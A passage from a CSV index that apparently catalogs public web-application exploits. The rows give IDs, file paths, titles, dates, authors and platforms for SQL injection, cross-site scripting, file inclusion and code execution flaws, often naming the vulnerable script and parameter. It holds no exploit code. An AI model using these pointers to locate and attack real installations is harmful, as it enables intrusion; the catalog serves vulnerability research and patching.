'index.php?filter' Cross-Site Scripting",2008-08-11,"James Bercegay",webapps,php, +32221,exploits/php/webapps/32221.txt,"Kayako SupportSuite 3.x - '/staff/index.php?customfieldlinkid' SQL Injection",2008-08-11,"James Bercegay",webapps,php, +32226,exploits/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",webapps,php, +32227,exploits/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",webapps,php, +32230,exploits/php/webapps/32230.txt,"IDevSpot PHPLinkExchange 1.01/1.02 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-12,sl4xUz,webapps,php, +32231,exploits/php/webapps/32231.txt,"Meet#Web 0.8 - 'modules.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php, +32232,exploits/php/webapps/32232.txt,"Meet#Web 0.8 - 'ManagerResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php, +32233,exploits/php/webapps/32233.txt,"Meet#Web 0.8 - 'ManagerRightsResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php, +32234,exploits/php/webapps/32234.txt,"Meet#Web 0.8 - 'RegForm.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php, +32235,exploits/php/webapps/32235.txt,"Meet#Web 0.8 - 'RegResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php, +32236,exploits/php/webapps/32236.txt,"Meet#Web 0.8 - 'RegRightsResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",webapps,php, +32237,exploits/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-03-13,"Jeroen - IT Nerdbox",webapps,hardware, +32238,exploits/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",webapps,hardware, +32239,exploits/php/webapps/32239.txt,"Fonality trixbox - SQL Injection",2014-03-13,Sc4nX,webapps,php, +32249,exploits/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",webapps,jsp, +32250,exploits/php/webapps/32250.py,"mUnky 0.01 - 'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",webapps,php, +32251,exploits/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion",2008-08-15,Lostmon,webapps,php, +32252,exploits/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - '/administrator/popups/index3pop.php?mosConfig_sitename' Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",webapps,php, +32253,exploits/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - '/mambots/editors/mostlyce/' PHP/connector.php?Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",webapps,php, +32254,exploits/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,webapps,php, +32255,exploits/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,webapps,asp, +32257,exploits/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injections",2008-08-15,baltazar,webapps,php, +32258,exploits/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",webapps,cgi, +32259,exploits/php/webapps/32259.txt,"Freeway 1.4.1.171 - '/english/account.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",webapps,php, +33409,exploits/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",webapps,php, +32285,exploits/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Cross-Site Scripting",2008-08-20,"Core Security",webapps,php, +32263,exploits/php/webapps/32263.txt,"Fonality trixbox - 'mac' Remote Code Injection",2014-03-14,i-Hmx,webapps,php,80 +32264,exploits/php/webapps/32264.txt,"Freeway 1.4.1.171 - '/french/account_newsletters.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",webapps,php, +32265,exploits/php/webapps/32265.txt,"Freeway 1.4.1.171 - '/includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",webapps,php, +32266,exploits/php/webapps/32266.txt,"Freeway 1.4.1.171 - '/includes/modules/newsdesk/newsdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",webapps,php, +32267,exploits/php/webapps/32267.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",webapps,php, +32268,exploits/php/webapps/32268.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",webapps,php, +32269,exploits/php/webapps/32269.txt,"Freeway 1.4.1.171 - '/templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",webapps,php, +32270,exploits/php/webapps/32270.txt,"Freeway 1.4.1.171 - '/templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",webapps,php, +32271,exploits/php/webapps/32271.txt,"NewsHOWLER 1.03 - Cookie Data SQL Injection",2008-08-18,"Khashayar Fereidani",webapps,php, +32272,exploits/php/webapps/32272.txt,"Ovidentia 6.6.5 - 'index.php' Cross-Site Scripting",2008-08-18,"ThE dE@Th",webapps,php, +32368,exploits/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",webapps,jsp,80 +32274,exploits/php/webapps/32274.txt,"Synology DSM 4.3-3827 - 'article.php' Blind SQL Injection",2014-03-14,"Michael Wisniewski",webapps,php,80 +32275,exploits/php/webapps/32275.txt,"itMedia - Multiple SQL Injections",2008-08-18,baltazar,webapps,php, +32278,exploits/asp/webapps/32278.txt,"K Web CMS - 'sayfala.asp' SQL Injection",2008-08-18,baltazar,webapps,asp, +32279,exploits/php/webapps/32279.txt,"Vanilla 1.1.4 - HTML Injection / Cross-Site Scripting",2008-08-19,"James Bercegay",webapps,php, +32280,exploits/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script - 'id' SQL Injection",2008-08-20,"Hussin X",webapps,php, +32281,exploits/php/webapps/32281.cs,"Folder Lock 5.9.5 - Weak Password Encryption Local Information Disclosure",2008-06-19,"Charalambous Glafkos",webapps,php, +32287,exploits/php/webapps/32287.txt,"FAR-PHP 1.0 - 'index.php' Local File Inclusion",2008-08-21,"Beenu Arora",webapps,php, +32288,exploits/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,webapps,php, +32290,exploits/php/webapps/32290.txt,"Accellion File Transfer - Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",webapps,php, +32291,exploits/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 - Search Cross-Site Scripting",2008-08-22,"Tyler Trioxide",webapps,php, +32293,exploits/php/webapps/32293.txt,"One-News - Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,webapps,php, +32295,exploits/php/webapps/32295.txt,"PHP-Ultimate WebBoard 2.0 - 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,webapps,php, +32296,exploits/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,webapps,php, +32297,exploits/asp/webapps/32297.txt,"Smart Survey 1.0 - 'surveyresults.asp' Cross-Site Scripting",2008-08-26,"Bug Researchers Group",webapps,asp, +32298,exploits/php/webapps/32298.txt,"HPSystem Management Homepage (SMH) 2.1.12 - 'message.php' Cross-Site Scripting",2008-08-26,"Luca Carettoni",webapps,php, +32299,exploits/php/webapps/32299.txt,"MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting",2008-08-26,"Sam Georgiou",webapps,php, +32300,exploits/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 - 'search.asp' Cross-Site Scripting",2008-08-26,JoCk3r,webapps,asp, +32302,exploits/php/webapps/32302.txt,"AbleSpace 1.0 - 'adv_cat.php' Cross-Site Scripting",2008-08-27,"Bug Researchers Group",webapps,php, +32306,exploits/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,webapps,php, +32307,exploits/php/webapps/32307.txt,"vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",webapps,php, +32308,exploits/php/webapps/32308.txt,"GenPortal - 'buscarCat.php' Cross-Site Scripting",2008-09-01,sl4xUz,webapps,php, +32309,exploits/php/webapps/32309.txt,"Full PHP Emlak Script - 'landsee.php' SQL Injection",2008-08-29,"Hussin X",webapps,php, +32312,exploits/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 - 'page' Cross-Site Scripting",2008-09-02,Am!r,webapps,php, +32313,exploits/php/webapps/32313.txt,"OpenDB 1.0.6 - 'user_admin.php?user_id' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,webapps,php, +32314,exploits/php/webapps/32314.txt,"OpenDB 1.0.6 - 'listings.php?title' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,webapps,php, +32315,exploits/php/webapps/32315.txt,"OpenDB 1.0.6 - 'user_profile.php?redirect_url' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,webapps,php, +32316,exploits/php/webapps/32316.txt,"eliteCMS 1.0 - 'page' SQL Injection",2008-09-03,e.wiZz!,webapps,php, +32317,exploits/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,webapps,php, +32318,exploits/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php?target' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32319,exploits/php/webapps/32319.txt,"OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery",2014-03-17,"TN CYB3R",webapps,php, +32320,exploits/php/webapps/32320.txt,"XRms 1.99.2 - 'title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32321,exploits/php/webapps/32321.txt,"XRms 1.99.2 - 'company_name' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32322,exploits/php/webapps/32322.txt,"XRms 1.99.2 - 'last_name' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32323,exploits/php/webapps/32323.txt,"XRms 1.99.2 - 'campaign_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32324,exploits/php/webapps/32324.txt,"XRms 1.99.2 - 'opportunity_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32325,exploits/php/webapps/32325.txt,"XRms 1.99.2 - 'case_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32326,exploits/php/webapps/32326.txt,"XRms 1.99.2 - 'file_id' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32327,exploits/php/webapps/32327.txt,"XRms 1.99.2 - 'starting' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",webapps,php, +32330,exploits/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,webapps,php, +32331,exploits/php/webapps/32331.txt,"Joomla! Component AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",webapps,php, +32334,exploits/php/webapps/32334.txt,"CeleronDude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,webapps,php, +32337,exploits/php/webapps/32337.txt,"Silentum LoginSys 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",webapps,php, +32338,exploits/php/webapps/32338.txt,"phpAdultSite CMS - 'results_per_page' Cross-Site Scripting",2008-09-07,"David Sopas",webapps,php, +32340,exploits/php/webapps/32340.txt,"Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-08,sl4xUz,webapps,php, +32342,exploits/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection",2008-09-08,"Omer Singer",webapps,php, +32346,exploits/php/webapps/32346.txt,"E-PHP B2B Trading Marketplace Script - 'listings.php' SQL Injection",2008-09-07,r45c4l,webapps,php, +32347,exploits/php/webapps/32347.txt,"UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",webapps,php, +32351,exploits/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusions",2008-09-10,SirGod,webapps,php, +32352,exploits/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,webapps,php, +32353,exploits/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",webapps,php, +32354,exploits/php/webapps/32354.txt,"Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",webapps,php, +32355,exploits/php/webapps/32355.txt,"Hot Links SQL-PHP - 'news.php' SQL Injection",2008-09-10,r45c4l,webapps,php, +32360,exploits/php/webapps/32360.txt,"Nooms 1.1 - 'smileys.php?page_id' Cross-Site Scripting",2008-09-11,Dr.Crash,webapps,php, +32361,exploits/php/webapps/32361.txt,"Nooms 1.1 - 'search.php?q' Cross-Site Scripting",2008-09-11,Dr.Crash,webapps,php, +32364,exploits/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,webapps,php, +32365,exploits/php/webapps/32365.txt,"Paranews 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,webapps,php, +32366,exploits/php/webapps/32366.txt,"QuicO - 'photo.php' SQL Injection",2008-09-12,"Beenu Arora",webapps,php, +32369,exploits/hardware/webapps/32369.txt,"Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities",2014-03-19,xistence,webapps,hardware, +32374,exploits/ios/webapps/32374.txt,"Wireless Drive 1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,webapps,ios, +32375,exploits/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,webapps,php, +32383,exploits/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",webapps,php, +32385,exploits/hardware/webapps/32385.txt,"D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",webapps,hardware, +32418,exploits/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections",2008-09-25,"David Sopas",webapps,php, +32419,exploits/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,webapps,php, +32421,exploits/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",webapps,php, +32422,exploits/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,webapps,php, +32423,exploits/jsp/webapps/32423.txt,"OpenNMS 1.5.x - 'j_username' Cross-Site Scripting",2008-09-25,d2d,webapps,jsp, +32424,exploits/jsp/webapps/32424.txt,"OpenNMS 1.5.x - 'Username' Cross-Site Scripting",2008-09-25,d2d,webapps,jsp, +32425,exploits/jsp/webapps/32425.txt,"OpenNMS 1.5.x - 'filter' Cross-Site Scripting",2008-09-25,d2d,webapps,jsp, +32427,exploits/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",webapps,php, +32430,exploits/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",webapps,cgi, +32431,exploits/php/webapps/32431.txt,"Lyrics Script - 'search_results.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",webapps,php, +32432,exploits/php/webapps/32432.txt,"ClickBank Portal - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",webapps,php, +32433,exploits/php/webapps/32433.txt,"Membership Script - Multiple Cross-Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",webapps,php, +32434,exploits/php/webapps/32434.txt,"Recipe Script - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",webapps,php, +32437,exploits/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated Remote Code Execution",2014-03-22,"Brandon Perry",webapps,php, +32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,webapps,php, +32443,exploits/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",webapps,php, +32444,exploits/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - '/wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",webapps,php, +32447,exploits/php/webapps/32447.txt,"A4Desk Event Calendar - 'v' Remote File Inclusion",2008-09-30,Lo$er,webapps,php, +32448,exploits/java/webapps/32448.txt,"Celoxis - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,webapps,java, +32449,exploits/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,webapps,php, +32450,exploits/php/webapps/32450.txt,"WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",webapps,php, +32453,exploits/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 - 'index.php' Cross-Site Scripting",2008-10-02,Am!r,webapps,php, +32455,exploits/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",webapps,php, +32459,exploits/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Cross-Site Scripting",2008-10-05,"Mazin Faour",webapps,java, +32461,exploits/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,webapps,php, +32462,exploits/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - 'POST' Filter Security Bypass",2008-10-06,WHK,webapps,php, +32463,exploits/php/webapps/32463.txt,"PHP Web Explorer 0.99b - 'main.php?refer' Traversal Local File Inclusion",2008-10-06,Pepelux,webapps,php, +32464,exploits/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php?File' Traversal Local File Inclusion",2008-10-06,Pepelux,webapps,php, +32467,exploits/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,webapps,php, +32468,exploits/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Multiple Remote File Inclusions",2008-10-08,GoLd_M,webapps,php, +32473,exploits/php/webapps/32473.txt,"Joomla! Component com_jeux - 'id' SQL Injection",2008-10-11,H!tm@N,webapps,php, +32474,exploits/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,webapps,php, +32479,exploits/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary File Upload",2014-03-24,"felipe andrian",webapps,php, +32520,exploits/php/webapps/32520.txt,"OpenCart 1.5.6.1 - 'openbay' Multiple SQL Injections",2014-03-26,"Saadi Siddiqui",webapps,php, +32563,exploits/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection",2008-11-02,"Hussin X",webapps,php, +32485,exploits/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi - 'xurunler.asp' SQL Injection",2008-10-13,tRoot,webapps,asp, +32486,exploits/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",webapps,php, +32487,exploits/php/webapps/32487.txt,"Elxis CMS 2008.1 - '/modules/mod_language.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-14,faithlove,webapps,php, +32488,exploits/php/webapps/32488.txt,"Elxis CMS 2008.1 - PHPSESSID Variable Session Fixation",2008-10-14,faithlove,webapps,php, +32490,exploits/php/webapps/32490.txt,"SweetCMS 1.5.2 - 'index.php' SQL Injection",2008-10-14,Dapirates,webapps,php, +32492,exploits/php/webapps/32492.txt,"Habari 0.5.1 - 'habari_username' Cross-Site Scripting",2008-10-16,faithlove,webapps,php, +32494,exploits/php/webapps/32494.txt,"FlashChat - 'connection.php' Role Filter Security Bypass",2008-10-17,eLiSiA,webapps,php, +32495,exploits/php/webapps/32495.txt,"Jetbox CMS 2.1 - '/admin/cms/images.php?orderby' SQL Injection",2008-10-20,"Omer Singer",webapps,php, +32496,exploits/php/webapps/32496.txt,"Jetbox CMS 2.1 - '/admin/cms/nav.php?nav_id' SQL Injection",2008-10-20,"Omer Singer",webapps,php, +32497,exploits/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module - 'id' SQL Injection",2008-10-20,r45c4l,webapps,php, +32498,exploits/asp/webapps/32498.txt,"Dizi Portali - 'diziler.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",webapps,asp, +32499,exploits/php/webapps/32499.txt,"PHPhotoGallery 0.92 - 'index.php' SQL Injection",2008-10-21,KnocKout,webapps,php, +32500,exploits/asp/webapps/32500.txt,"Bahar Download Script 2.0 - 'aspkat.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",webapps,asp, +32502,exploits/php/webapps/32502.txt,"Getsimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",webapps,php, +32503,exploits/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,webapps,php, +32504,exploits/php/webapps/32504.txt,"Cart Engine 3.0.0 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,webapps,php, +32505,exploits/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure",2014-03-25,LiquidWorm,webapps,php, +32506,exploits/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,webapps,php, +32507,exploits/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,webapps,php, +32508,exploits/php/webapps/32508.txt,"Kemana Directory 1.5.6 - 'task.php' Local File Inclusion",2014-03-25,LiquidWorm,webapps,php, +32509,exploits/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,webapps,php, +32510,exploits/php/webapps/32510.txt,"Kemana Directory 1.5.6 - 'qvc_init()' Cookie Poisoning CAPTCHA Bypass",2014-03-25,LiquidWorm,webapps,php, +32511,exploits/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,webapps,php,80 +32516,exploits/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",webapps,php,80 +32521,exploits/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusions",2008-10-23,BoZKuRTSeRDaR,webapps,php, +32523,exploits/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection",2008-10-23,xuanmumu,webapps,php, +32524,exploits/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,webapps,php, +32525,exploits/php/webapps/32525.txt,"Jetbox CMS 2.1 - 'liste' Cross-Site Scripting",2008-10-23,"Omer Singer",webapps,php, +32526,exploits/php/webapps/32526.txt,"ClipShare Pro 4.0 - 'fullscreen.php' Cross-Site Scripting",2008-10-23,ShockShadow,webapps,php, +32527,exploits/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 - 'html-tidy-logic.php' Cross-Site Scripting",2008-10-23,ShockShadow,webapps,php, +32528,exploits/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Cross-Site Scripting",2008-10-24,"Ghost Hacker",webapps,php, +32531,exploits/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",webapps,php, +32532,exploits/php/webapps/32532.txt,"bcoos 1.0.13 - 'common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,webapps,php, +32533,exploits/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injections",2008-10-27,G4N0K,webapps,php, +32535,exploits/php/webapps/32535.txt,"MyBB 1.4.2 - 'moderation.php' Cross-Site Scripting",2008-10-27,Kellanved,webapps,php, +32536,exploits/php/webapps/32536.txt,"bcoos 1.0.13 - 'click.php' SQL Injection",2008-10-27,DeltahackingTEAM,webapps,php, +32537,exploits/php/webapps/32537.txt,"All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,webapps,php, +32538,exploits/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Cross-Site Scripting",2008-10-28,Ehsan_Hp200,webapps,php, +32539,exploits/php/webapps/32539.html,"Microsoft Internet Explorer 6 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",webapps,php, +32540,exploits/php/webapps/32540.pl,"H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass",2008-10-28,StAkeR,webapps,php, +32541,exploits/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,webapps,php, +32542,exploits/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 - 'view.php' SQL Injection",2008-10-28,G4N0K,webapps,php, +32543,exploits/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 - 'search.php' Cross-Site Scripting",2008-10-28,cize0f,webapps,php, +32544,exploits/php/webapps/32544.txt,"KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,webapps,php, +32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell",2014-03-26,"Groundworks Technologies",webapps,hardware,80 +32546,exploits/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,webapps,php, +32547,exploits/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,webapps,php, +32549,exploits/asp/webapps/32549.txt,"Dorsa CMS - 'Default_.aspx' Cross-Site Scripting",2008-10-29,Pouya_Server,webapps,asp, +32553,exploits/php/webapps/32553.txt,"phpWebSite 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",webapps,php, +32554,exploits/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",webapps,php, +32556,exploits/multiple/webapps/32556.txt,"Dell SonicWALL EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,webapps,multiple,8619 +32557,exploits/ios/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution",2014-03-27,Vulnerability-Lab,webapps,ios,8080 +32558,exploits/ios/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,webapps,ios,8080 +32559,exploits/ios/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,webapps,ios,8080 +32560,exploits/ios/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,webapps,ios,8080 +32561,exploits/php/webapps/32561.txt,"LinEx - Password Reset",2014-03-27,"N B Sri Harsha",webapps,php,80 +32562,exploits/php/webapps/32562.txt,"Joomla! Component Kunena 3.0.4 - Persistent Cross-Site Scripting",2014-03-27,Qoppa,webapps,php,80 +32566,exploits/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 - Cross-Site Scripting",2008-11-04,"Brad Antoniewicz",webapps,php, +32567,exploits/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-04,Lostmon,webapps,php, +32569,exploits/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,webapps,ios,8888 +32570,exploits/php/webapps/32570.txt,"CuteNews aj-fork - 'path' Remote File Inclusion",2008-11-06,DeltahackingTEAM,webapps,php, +32571,exploits/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 - SQL Injection / Cross-Site Scripting",2008-11-07,G4N0K,webapps,php, 